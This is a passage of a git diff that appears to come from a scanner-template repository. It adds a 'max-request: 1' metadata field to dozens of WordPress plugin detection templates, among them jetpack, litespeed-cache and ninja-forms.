https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..7b0f188ff7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..898e4de56d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..4a76856a69 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..b321ca63eb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..2b42c9f80c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index a8eca7b056..2409c6b370 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: + max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..dbea07a6da 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..17a8f220cf 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..956a08b32d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..5a570b9077 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4ecac0cd92 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..e50f58cef8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..031bb48563 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..3cdcf3da93 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c222bc9d4a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 43cb2ab09c..c8acf8c625 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..66b7d6a363 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..a36016562d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 3e89505574..8033aacbc6 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: + max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..e4017b1a0a 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..53d6d393bd 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..c286e9a14f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..364e3cd71e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..4fcccbfc33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..3fbc714d3b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..c49b506979 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..dfcaf6f71b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..61be246fee 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 6f06b49011..1c16a72d76 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: + max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..50d2e6630b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..8d71f7bde9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..5e1f97086e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..d87d456a8c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5ce87e6c71..aa9153241e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..09641796a3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..28b70d09bf 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..b43c10ed7a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..eb7e78bc7f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index bbc305b8de..3da2ea50e1 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..7a58c58f63 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..5f99b8cac8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..b08876df04 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..3f68dffe06 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..34f9bde1d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d9f645328f 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..8a1196fc9f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..05025452b7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 81f58198d3..1db1b57708 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..dafe6974f6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..ba05fb1e16 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..7f98d822a8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..89602f4264 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2f6513ca42 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..982306b13c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..fdcac13b56 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index a81fc892ca..fc316f9f7a 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..975b63f5de 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..5065659e82 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..732ffbc4eb 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ 